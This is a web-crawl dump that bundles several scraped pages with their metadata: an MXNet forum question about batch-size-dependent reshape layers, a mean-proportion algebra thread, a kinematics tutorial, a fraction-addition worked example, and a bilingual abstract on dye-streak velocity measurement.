[ "", null, "# NLP prediction using a CNN pretrained model\n\nHi,\n\nFollowing the tutorial posted here https://mxnet.incubator.apache.org/tutorials/nlp/cnn.html I tried loading the model from the checkpoint for the purpose of using it to make predictions on single samples of text (in other words, batches of 1 sample). However, because the model is trained on a batch of size 50, I have problems loading the model.\n\n``````sym, arg_params, aux_params = mx.model.load_checkpoint('cnn', 3)\nmod = mx.mod.Module(symbol=sym, context=mx.cpu(), label_names=None)\nmod.bind(for_training=False, data_shapes=[('data', (1,56))],\nlabel_shapes=mod._label_shapes)\nmod.set_params(arg_params, aux_params, allow_missing=True)\n``````\n\nThe above code breaks with:\n\n``````data: (1, 56)\nError in operator reshape0: [20:32:53] src/operator/tensor/./matrix_op-inl.h:179: Check failed: oshape.Size() == dshape.Size() Target shape size is different to source. Target: 840000\nSource: 16800\n``````\n\nThis is because the CNN model has several `Reshape` layers which are configured based on the batch size:\n\n`conv_input = mx.sym.Reshape(data=embed_layer, target_shape=(batch_size, 1, sentence_size, num_embed))`\n\nThe questions is how can I load the model and use it for predicting on one sample of text? I do not want to train with a batch size of 1, because that is not optimal.\n\nIf the network architecture is related to batch size, you may need to feed in the corresponding batch size of data. A possible solution is to repeat your input data 50 times and composes (50, 56) data shape.\n\n1 Like\n\nThat is indeed a way of solving the issue and I have actually tried it, alas I don’t think it is elegant to brute force my way into using the model\n\nI face the same problem. Is there another solution than repeating the data to get the same size as the batch_size?" ]
[ null, "https://aws1.discourse-cdn.com/business4/uploads/mxnet/original/1X/3d10efb26d5e71b44832c33bc092f6a2711134bb.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8388131,"math_prob":0.9138687,"size":1248,"snap":"2020-34-2020-40","text_gpt3_token_len":315,"char_repetition_ratio":0.10369775,"word_repetition_ratio":0.0,"special_character_ratio":0.2636218,"punctuation_ratio":0.21705426,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9841743,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-29T08:53:40Z\",\"WARC-Record-ID\":\"<urn:uuid:7aa8da72-5f05-494f-a7fb-64eed4343140>\",\"Content-Length\":\"20504\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:25c8f8d7-778d-4090-afc6-f5faea6509ef>\",\"WARC-Concurrent-To\":\"<urn:uuid:2eb4c4c2-df90-47b2-b6f2-21b642d0b10b>\",\"WARC-IP-Address\":\"72.52.80.15\",\"WARC-Target-URI\":\"https://discuss.mxnet.apache.org/t/nlp-prediction-using-a-cnn-pretrained-model/280\",\"WARC-Payload-Digest\":\"sha1:F2YE43OZ64GAGOK3OB7GUC2QWZR672N6\",\"WARC-Block-Digest\":\"sha1:YQOLUOT4H3WQPGW5UVQMXCG3GYLYAGTS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401632671.79_warc_CC-MAIN-20200929060555-20200929090555-00593.warc.gz\"}"}
https://mathhelpboards.com/threads/fraction-problem.7334/
[ "# Fraction Problem\n\n#### kuheli\n\n##### New member\nif b is the mean proportion between a and c ; prove that\n\n(a^2 - b^2 + c^2) / (a^-2 - b^-2 + c^-2) = b^4\n\n#### Petrus\n\n##### Well-known member\nRe: please help with this fraction problem\n\nif b is the mean proportion between a and c ; prove that\n\n(a^2 - b^2 + c^2) / (a^-2 - b^-2 + c^-2) = b^4\nHello,\nDo you got any progress?\ndo you know what they mean with \"b is the mean proportion between a and c\"\n$$\\displaystyle b^2=ac$$ put that on left side what do you got?\n\nRegards,\n$$\\displaystyle |\\pi\\rangle$$\n\n#### kuheli\n\n##### New member\nya i got it .. thanks a lot", null, "" ]
[ null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.866656,"math_prob":0.9922414,"size":170,"snap":"2021-04-2021-17","text_gpt3_token_len":70,"char_repetition_ratio":0.09638554,"word_repetition_ratio":0.0,"special_character_ratio":0.5,"punctuation_ratio":0.069767445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996401,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-19T06:51:07Z\",\"WARC-Record-ID\":\"<urn:uuid:00f66e3b-38b6-41e6-906a-9bd56c05b444>\",\"Content-Length\":\"59193\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c3b3ae3f-e655-43ae-b1ab-8d38dac67db9>\",\"WARC-Concurrent-To\":\"<urn:uuid:0f33a730-82a7-46de-9b4f-5f9f2476ecf6>\",\"WARC-IP-Address\":\"50.31.99.218\",\"WARC-Target-URI\":\"https://mathhelpboards.com/threads/fraction-problem.7334/\",\"WARC-Payload-Digest\":\"sha1:6NP5BJX37LDKCHUNJ7VCZKCRCKG5XF74\",\"WARC-Block-Digest\":\"sha1:JEDI3IGQB5DP3CNPFMQKRGVWYGRW7PIK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038878326.67_warc_CC-MAIN-20210419045820-20210419075820-00436.warc.gz\"}"}
https://mathsathome.com/displacement-velocity-acceleration/
[ "# How to Find Displacement, Velocity and Acceleration\n\n## Definitions of Displacement, Velocity, Acceleration and Jerk\n\nDisplacement is a vector quantity that is defined as the shortest distance between the initial and final position of an object. Distance is a scalar quantity and is the length of the total path taken by an object. Distance is only measured as a positive value whereas displacement is measured in both positive and negative directions.\n\nIf a car drives 10m in one direction and then immediately drives 10m in the opposite direction back to its starting location, the total distance travelled by the car will be 20m. However, the total displacement of the car will be zero as its final position is now the same as its initial location.\n\nSpeed is a scalar quantity and is defined as the distance travelled per unit time. Velocity is a vector quantity and is defined as the displacement travelled per unit time. Velocity must also have a direction. A negative velocity means that the object is traveling in the opposite direction to the positive direction.\n\nOften, a positive velocity refers to an object travelling in the forwards direction, whilst a negative velocity is used to describe an object travelling in the backwards direction.\n\nIf an object has zero velocity, either it is stationary or it is reversing its direction of travel.\n\nSpeed is the rate of change of distance with time, whereas velocity is the rate of change of displacement with time.\n\nSpeed is not a vector quantity. This means that it is not described by a direction. An object travelling at 10ms-1 forwards has the same speed as an object travelling at 10ms-1 backwards. Despite having different velocities, their speeds are equal.\n\nAcceleration is the rate of change of velocity. It is a vector quantity, which means that it has a magnitude and direction. If an object has zero acceleration, its velocity does not change.\n\nAn object undergoes acceleration if it speeds up, slows down or changes direction.\n\nIn kinematics, jerk is the rate of change of acceleration with respect to time. It is a vector quantity. Jerk is the derivative of acceleration and has the units m/s3.\n\nJerk is the third derivative of displacement with respect to time. Snap, crackle and pop are the fourth, fifth and sixth derivatives of displacement respectively. Snap, crackle and pop are named after the Rice Krispies mascots and have little practical use.\n\nThe standard units of displacement are metres (m). Velocity has the units of metres per second (ms-1) and acceleration has the units of metres per second squared (ms-2).\n\n## The Relationship Between Displacement, Velocity and Acceleration\n\nThe equation for the instantaneous velocity of a particle can be found by differentiating the displacement equation with respect to time. The equation for the instantaneous acceleration of a particle can be found by differentiating the velocity equation with respect to time. 
Velocity is the first derivative of displacement and acceleration is the second derivative.\n\n### How to find Velocity and Acceleration by Differentiating Displacement\n\nExample 1: The displacement of a particle from an origin is given by s(t) = t^3 - 2t + 3 m, where t is the time in seconds.\n\nFind expressions for the velocity and acceleration.\n\nThe velocity equation is found by differentiating the displacement equation with respect to time.\n\nThe displacement equation is s(t) = t^3 - 2t + 3.\n\nDifferentiating, the velocity equation is v(t) = 3t^2 - 2.\n\nThe acceleration equation is found by differentiating the velocity equation with respect to time.\n\nDifferentiating, the acceleration equation is a(t) = 6t.\n\nFind the velocity after 2 seconds.\n\nSince velocity is required, the velocity equation of v(t) = 3t^2 - 2 is considered.\n\nWe simply substitute t=2 into this equation to find the velocity after 2 seconds. v(2) = 3 × (2)^2 - 2 and so, v(2) = 10 ms-1.\n\nExample 2: The displacement of a particle from an origin is given by s(t) = t^3 + 2t^2 - 5t m, where t is the time in seconds.\n\nFind expressions for the velocity and acceleration.\n\nDifferentiating the displacement equation with respect to time, v(t) = 3t^2 + 4t - 5 ms-1.\n\nDifferentiating the velocity equation with respect to time, a(t) = 6t + 4 ms-2.\n\nFind the displacement when the acceleration is 16ms-2.\n\nIn this question, we first must find the time at which the acceleration is equal to 16. a(t) = 6t + 4 and so, setting the acceleration to 16 we obtain 16 = 6t + 4.\n\nSolving for time, we obtain t = 2 seconds. Therefore the acceleration is 16ms-2 after 2 seconds.\n\nNow we substitute t=2 into the displacement equation to obtain the answer. s(t) = t^3 + 2t^2 - 5t and s(2) = (2)^3 + 2 × (2)^2 - 5 × (2), which equals 6 m.\n\n### Finding Displacement by Integrating Velocity\n\nTo find the displacement equation, integrate the velocity equation with respect to time. The constant of integration can be found by substituting any initial conditions into the displacement equation.\n\nExample 1: The velocity of a particle is given by v(t) = 2t + 3 ms-1. Find the equation for the displacement of the particle if it was at the origin initially.\n\nThe displacement of the particle is found by integrating the velocity equation. s(t) = ∫v(t) dt and so, s(t) = ∫(2t + 3) dt.\n\nTherefore the displacement is given by s(t) = t^2 + 3t + C, where C is the constant of integration.\n\nTo find the value of C, we substitute in a known displacement. We know that the particle was at the origin initially. This means that the displacement was zero when the time was zero.\n\nSubstituting s(0)=0, the equation becomes 0 = (0)^2 + 3 × (0) + C and so, C = 0.\n\nTherefore the displacement equation is just s(t) = t^2 + 3t m.\n\nFind the displacement after 1 second.\n\nIn this question, we simply substitute a time of t=1 into the displacement equation that we have just found. s(t) = t^2 + 3t and so, s(1) = (1)^2 + 3 × (1). s(1) = 4 m and so, the displacement is 4 metres after 1 second.\n\nExample 2: Find the displacement of a particle with acceleration a(t) = 6t - 1 ms-2 if it is initially 2 m to the right of the origin, travelling at 1ms-1.\n\nTo find the velocity, integrate the acceleration equation. v(t) = ∫a(t) dt. v(t) = ∫(6t - 1) dt and so, v(t) = 3t^2 - t + C.\n\nWe know that the particle is moving 1ms-1 when the time equals zero. 1 = 3(0)^2 - (0) + C and therefore, C = 1.\n\nThe velocity equation is v(t) = 3t^2 - t + 1.\n\nTo find the displacement equation, integrate the velocity equation. s(t) = ∫v(t) dt and so, s(t) = ∫(3t^2 - t + 1) dt. s(t) = t^3 - (1/2)t^2 + t + K.\n\nWe know that the particle starts 2 metres away from the origin initially. This means that when time equals zero, the displacement is 2.\n\nTherefore 2 = (0)^3 - (1/2)(0)^2 + (0) + K and so, K = 2.\n\nTherefore the displacement equation is s(t) = t^3 - (1/2)t^2 + t + 2.\n\n## Displacement from the Velocity-Time Graph\n\nThe displacement of an object is equal to the area between the line of a velocity-time graph and the axis. Where the graph is above the axis, the displacement is positive. Where the graph is below the axis, the displacement is negative.\n\nFor example, the displacement can be found for the velocity-time graph below by finding the area between the graph and the time axis.\n\nThe displacement is the integral of velocity. The area under a curve is found using integration. Therefore the area under the velocity-time graph is equal to the displacement.\n\n• In the first 4 seconds, the area is the area of a triangle with a base of 4 and a height of 5. (4 × 5)/2 = 10 and so, the displacement in the first 4 seconds is 10 metres.\n\n• Between 4 and 10 seconds, the area is the area of a rectangle with base 6 and height 5. 6 × 5 = 30 and so, the displacement between 4 and 10 seconds is 30 metres.\n\n• Between 10 and 16 seconds, the area is the area of a rectangle with base 6 and height 3. 6 × 3 = 18 and because this rectangle is below the time axis, this displacement is negative. The displacement between 10 and 16 seconds is -18 metres.\n\nThe total displacement from 0 to 16 seconds is found by finding the sum of the areas from 0 to 16.\n\n10 + 30 – 18 = 22 and so, the displacement is 22 metres.\n\nThe object moved forwards 10 metres then moved forwards a further 30 metres before reversing 18 metres.\n\n## Acceleration from the Velocity-Time Graph\n\nThe acceleration of an object is given by the slope of the velocity-time graph. The size of the gradient between two points on a velocity-time graph is equal to the average acceleration over this time period. The instantaneous acceleration at a particular time is equal to the gradient of the tangent to the velocity-time graph at this point.\n\nThe gradient is calculated as rise over run.\n\nAcceleration is the derivative of velocity. The gradient of a graph is found using differentiation. Therefore the gradient of the velocity-time graph is equal to the acceleration.\n\nFor example, in the first 3 seconds of the velocity-time graph below, the rise is 6 and the run is 3. 6/3 = 2 and so, the acceleration in the first 3 seconds is 2ms-2.\n\nIn the time from 3 to 10 seconds, the acceleration is zero because the gradient is zero.\n\nFor the regions where the velocity-time graph is horizontal, the acceleration is zero. This is because the gradient is zero.\n\nIn the region from 10 to 14 seconds, the rise is -6 and the run is 4. -6/4 = -1.5 and so, the acceleration between 10 and 14 seconds is -1.5ms-2.\n\n## Formulae for Displacement, Velocity and Acceleration\n\nThe formula linking displacement, velocity and acceleration is s = vt - (1/2)at^2, where s is displacement, v is velocity and a is acceleration. This formula works provided the acceleration is constant.\n\nThe equations of motion linking displacement (s), velocity (v), acceleration (a), initial velocity (u) and time (t) are:\n\n• v = u + at\n• s = ut + (1/2)at^2\n• v^2 = u^2 + 2as\n• s = (1/2)(u + v)t\n• s = vt - (1/2)at^2\n\n## How to Find Where a Particle Changes Direction\n\nA particle changes direction at the positions where v=0 and a≠0. Set the velocity equation equal to zero and solve for time. If the acceleration at these times is zero, then the particle is stationary. If the acceleration is not equal to zero, then it is changing direction.\n\nFor example, the displacement of a particle from an origin is given by s(t) = t^2 - 6t + 4 m, where t is the time in seconds.\n\nFind the displacement when the particle changes direction.\n\n1. Find the expression for velocity by differentiating the displacement equation: v(t) = 2t - 6 ms-1.\n\n2. Set the velocity equation to zero and solve for time.\n\n0 = 2t - 6 and so, t = 3 seconds.\n\nThe particle reverses direction after 3 seconds.\n\nTo find the displacement of the particle when it changes direction, substitute the time of t=3 into the displacement equation. s(t) = t^2 - 6t + 4 and so, s(3) = (3)^2 - 6 × (3) + 4.\n\nThis equals -5 and so, the particle is located at -5 metres from the origin when it turns around." ]
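The differentiation and integration steps in the worked examples above can be reproduced symbolically. The following Python sketch is an illustration added here (using the SymPy library; it is not part of the original article) and repeats Example 2 of the integration section: starting from a(t) = 6t - 1 with v(0) = 1 and s(0) = 2.

```python
import sympy as sp

t = sp.symbols("t")

# Acceleration from the worked example: a(t) = 6t - 1, with v(0) = 1 and s(0) = 2.
a = 6 * t - 1

C = sp.symbols("C")
v = sp.integrate(a, t) + C                       # v(t) = 3t^2 - t + C
C_val = sp.solve(sp.Eq(v.subs(t, 0), 1), C)[0]   # initial velocity 1 m/s gives C = 1
v = v.subs(C, C_val)

K = sp.symbols("K")
s = sp.integrate(v, t) + K                       # s(t) = t^3 - t^2/2 + t + K
K_val = sp.solve(sp.Eq(s.subs(t, 0), 2), K)[0]   # initial displacement 2 m gives K = 2
s = s.subs(K, K_val)

print(v)                 # 3*t**2 - t + 1
print(s)                 # t**3 - t**2/2 + t + 2
print(sp.diff(s, t, 2))  # differentiating twice recovers a(t) = 6*t - 1
```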
[ null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-2t%2B3%5C%20m", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-2t%2B3", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-2", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-2", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(2%5Cright)%3D3%5Ctimes%5Cleft(2%5Cright)%5E2-2", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(2%5Cright)%3D10ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3%2B2t%5E2-5t%5C%20m", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2%2B4t-5%5C%20ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t%2B4%5C%20ms%5E%7B-2%7D", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t%2B4%5C%20", null, "https://equatio-api.texthelp.com/svg/16%3D6t%2B4%5C%20", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3%2B2t%5E2-5t", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(2%5Cright)%3D%5Cleft(2%5Cright)%5E3%2B2%5Ctimes%5Cleft(2%5Cright)%5E2-5%5Ctimes%5Cleft(2%5Cright)", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D2t%2B3%5C%20ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%5C%20%7D%5E%7B%5C%20%7Dv%5Cleft(t%5Cright)%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%5C%20%7D%5E%7B%5C%20%7D2t%2B3%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2%2B3t%2BC", null, "https://equatio-api.texthelp.com/svg/0%3D%5Cleft(0%5Cright)%5E2%2B3%5Ctimes%5Cleft(0%5Cright)%2BC", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2%2B3t", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2%2B3t", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(1%5Cright)%3D%5Cleft(1%5Cright)%5E2%2B3%5Ctimes%5Cleft(1%5Cright)", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(1%5Cright)%3D4%5C%20m", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t-1%5C%20ms%5E%7B-2%7D", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7Da%5Cleft(t%5Cright)dt", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7D6t-1%5C%20dt", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-t%2BC", null, "https://equatio-api.texthelp.com/svg/1%3D3%5Cleft(0%5Cright)%5E2-%5Cleft(0%5Cright)%2BC", null, "https://equatio-api.texthelp.com/svg/1%3DC", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-t%2B1", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7Dv%5Cleft(t%5Cright)%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7D3t%5E2-t%2B1%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-%5Cfrac%7B1%7D%7B2%7Dt%5E2%2Bt%2BK", null, "https://equatio-api.texthelp.com/svg/2%3D%5Cleft(0%5Cright)%5E3-%5Cfrac%7B1%7D%7B2%7D%5Cleft(0%5Cright)%5E2%2B%5Cleft(0%5Cright)%2BK", null, "https://equatio-api.texthelp.com/svg/2%3DK", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-%5Cfrac%7B1%7D%7B2%7Dt%5E2%2Bt%2B2", null, "https://equatio-api.texthelp.com/svg/%5Cfrac%7B%5Cleft(4%5Ctimes5%5Cright)%7D%7B2%7D%3D10", null, 
"https://equatio-api.texthelp.com/svg/6%5Ctimes5%3D30", null, "https://equatio-api.texthelp.com/svg/6%5Ctimes3%3D18", null, "https://equatio-api.texthelp.com/svg/%5Cfrac%7B6%7D%7B3%7D%3D2", null, "https://equatio-api.texthelp.com/svg/%5Cfrac%7B-6%7D%7B4%7D%3D-1.5", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2-6t%2B4%5C%20m", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D2t-6%5C%20ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2-6t%2B4", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(3%5Cright)%3D%5Cleft(3%5Cright)%5E2-6%5Ctimes%5Cleft(3%5Cright)%2B4", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91810745,"math_prob":0.99536073,"size":10417,"snap":"2023-40-2023-50","text_gpt3_token_len":2219,"char_repetition_ratio":0.22683184,"word_repetition_ratio":0.136,"special_character_ratio":0.2124412,"punctuation_ratio":0.11088811,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998203,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90],"im_url_duplicate_count":[null,2,null,2,null,4,null,2,null,4,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,4,null,4,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-06T08:46:49Z\",\"WARC-Record-ID\":\"<urn:uuid:649b6fc6-f4af-4981-8a81-c6c0b32c1310>\",\"Content-Length\":\"259837\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5544062f-673d-4a69-acc8-ad8c3a4f0b63>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb9ca68e-2d8f-4416-893b-87b76d2baa5f>\",\"WARC-IP-Address\":\"172.67.200.96\",\"WARC-Target-URI\":\"https://mathsathome.com/displacement-velocity-acceleration/\",\"WARC-Payload-Digest\":\"sha1:5JFCYUKVLIGOB5TTBRY6JG3JCVUAF7HW\",\"WARC-Block-Digest\":\"sha1:P5UYMLTV7YDJQZLTH63CWUYULLC2HH5R\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100583.31_warc_CC-MAIN-20231206063543-20231206093543-00702.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/14-4-plus-1-27
[ "Solutions by everydaycalculation.com\n\nAdd 14/4 and 1/27\n\n1st number: 3 2/4, 2nd number: 1/27\n\n14/4 + 1/27 is 191/54.\n\nSteps for adding fractions\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 4 and 27 is 108\n2. For the 1st fraction, since 4 × 27 = 108,\n14/4 = 14 × 27/4 × 27 = 378/108\n3. Likewise, for the 2nd fraction, since 27 × 4 = 108,\n1/27 = 1 × 4/27 × 4 = 4/108\n4. Add the two fractions:\n378/108 + 4/108 = 378 + 4/108 = 382/108\n5. After reducing the fraction, the answer is 191/54\n6. In mixed form: 329/54" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61641437,"math_prob":0.99878305,"size":369,"snap":"2019-43-2019-47","text_gpt3_token_len":177,"char_repetition_ratio":0.23835616,"word_repetition_ratio":0.0,"special_character_ratio":0.56368566,"punctuation_ratio":0.089108914,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99933267,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-15T05:57:53Z\",\"WARC-Record-ID\":\"<urn:uuid:536916bc-57d5-4caa-8163-e698b75fc2d3>\",\"Content-Length\":\"8618\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a6d76a71-a9f4-400d-adcb-56c05563cee3>\",\"WARC-Concurrent-To\":\"<urn:uuid:b98ae66a-77eb-42a6-a533-107222c4490d>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/14-4-plus-1-27\",\"WARC-Payload-Digest\":\"sha1:3TXIMX32NOWWCFRUOSN2VCOHRAO2H3CT\",\"WARC-Block-Digest\":\"sha1:YLBSOUY5R3CL5L5XCQNA2FQGWXR6CVTR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986657586.16_warc_CC-MAIN-20191015055525-20191015083025-00072.warc.gz\"}"}
http://sjce.journals.sharif.edu/article_26.html
[ "# برآورد سرعت سیال با استفاده از نوار خطوط رنگی\n\nنوع مقاله : یادداشت فنی\n\nنویسندگان\n\n1 دانشکده مهندسی عمران، دانشگاه صنعتی شریف\n\n2 دانشکده‌ی مهندسی عمران، دانشگاه صنعتی شریف\n\nچکیده\n\nاستفاده از مواد رنگی ــ نظیر فلوئورسین که می‌توانند در آب خطوط رنگی تولید کنند، یکی از روش‌های به‌دست آوردن سرعت سیال است. در این تحقیق ضمن بررسی آزمایشگاهی تأثیر یک ناهمواری بلند بر تغییرات سرعت در یک سیال دولایه، سرعت سیال در بالادست ناهمواری با استفاده از روش خطوط رنگی به دست می‌آید. سپس سرعت به‌دست آمده از این روش با یک مدل عددیِ تعمیم یافته مقایسه می‌شود. این مدل عددی از حل عددی معادلات حاکم بر حرکت سیال برای بستری ناهموار و در دستگاه مختصات منحنی‌الخط حاصل شده است. توزیع سرعت و دبی لایه ها با استفاده از روش خطوط رنگی محاسبه شده و با نتایج عددی مقایسه می شوند. نتایج این مقایسه حاکی از قابلیت‌های این روش برای برآورد سرعت سیال است.\n\nکلیدواژه‌ها\n\nعنوان مقاله [English]\n\n### F‌L‌U‌I‌D V‌E‌L‌O‌C‌I‌T‌Y M‌E‌A‌S‌U‌R‌E‌M‌E‌N‌T‌S U‌S‌I‌N‌G D‌Y‌E S‌T‌R‌E‌A‌K M‌E‌T‌H‌O‌D\n\nنویسندگان [English]\n\n• M. A‌k‌h‌a‌v‌an 1\n• M.M. Jamali 2\n1 D‌e‌p‌t. o‌f C‌i‌v‌i‌l E‌n‌g‌i‌n‌e‌e‌r‌i‌n‌g S‌h‌a‌r‌i‌f U‌n‌i‌v‌e‌r‌s‌i‌t‌y o‌f T‌e‌c‌h‌n‌o‌l‌o‌g‌y\n2 D‌e‌p‌t. o‌f C‌i‌v‌i‌l E‌n‌g‌i‌n‌e‌e‌r‌i‌n‌g S‌h‌a‌r‌i‌f U‌n‌i‌v‌e‌r‌s‌i‌t‌y o‌f T‌e‌c‌h‌n‌o‌l‌o‌g‌y\nچکیده [English]\n\nU‌s‌i‌n‌g c‌o‌l‌o‌r‌e‌d s‌u‌b‌s‌t‌a‌n‌c‌e‌s l‌i‌k‌e F‌l‌u‌o‌r‌e‌s‌c‌e‌n‌t a‌n‌d N‌i‌g‌r‌o‌s‌i‌n‌e c‌r‌y‌s‌t‌a‌l‌s w‌h‌i‌c‌h p‌r‌o‌d‌u‌c‌e d‌y‌e s‌t‌r‌e‌a‌k‌s i‌n w‌a‌t‌e‌r i‌s o‌n‌e w‌a‌y o‌f o‌b‌t‌a‌i‌n‌i‌n‌g v‌e‌l‌o‌c‌i‌t‌y p‌r‌o‌f‌i‌l‌e‌s o‌f a f‌l‌u‌i‌d. I‌n t‌h‌i‌s s‌t‌u‌d‌y t‌h‌e e‌f‌f‌e‌c‌t‌s o‌f a l‌a‌r‌g‌e s‌i‌l‌l o‌n t‌h‌e s‌e‌l‌e‌c‌t‌i‌v‌e w‌i‌t‌h‌d‌r‌a‌w‌a‌l o‌f a t‌w‌o-l‌a‌y‌e‌r f‌l‌u‌i‌d t‌h‌r‌o‌u‌g‌h a l‌i‌n‌e s‌i‌n‌k i‌s e‌x‌a‌m‌i‌n‌e‌d e‌x‌p‌e‌r‌i‌m‌e‌n‌t‌a‌l‌l‌y. T‌h‌e f‌l‌o‌w f‌i‌e‌l‌d u‌p‌s‌t‌r‌e‌a‌m o‌f t‌h‌e s‌i‌l‌l w‌a‌s m‌e‌a‌s‌u‌r‌e‌d u‌s‌i‌n‌g d‌y‌e s‌t‌r‌e‌a‌k‌s m‌e‌t‌h‌o‌d a‌n‌d t‌h‌e r‌e‌s‌u‌l‌t‌s w‌e‌r‌e c‌o‌m‌p‌a‌r‌e‌d w‌i‌t‌h t‌h‌e p‌r‌e‌d‌i‌c‌t‌i‌o‌n‌s o‌f a n‌u‌m‌e‌r‌i‌c‌a‌l m‌o‌d‌e‌l. T‌h‌e c‌o‌m‌p‌a‌r‌i‌s‌o‌n o‌f t‌h‌e d‌i‌s‌c‌h‌a‌r‌g‌e‌s a‌n‌d v‌e‌l‌o‌c‌i‌t‌y p‌r‌o‌f‌i‌l‌e‌s i‌n‌d‌i‌c‌a‌t‌e‌s a g‌o‌o‌d a‌g‌r‌e‌e‌m‌e‌n‌t b‌e‌t‌w‌e‌e‌n t‌h‌e\nm‌e‌a‌s‌u‌r‌e‌d v‌e‌l‌o‌c‌i‌t‌y p‌r‌o‌f‌i‌l‌e‌s a‌n‌d t‌h‌e p‌r‌e‌d‌i‌c‌t‌i‌o‌n‌s.\n\nکلیدواژه‌ها 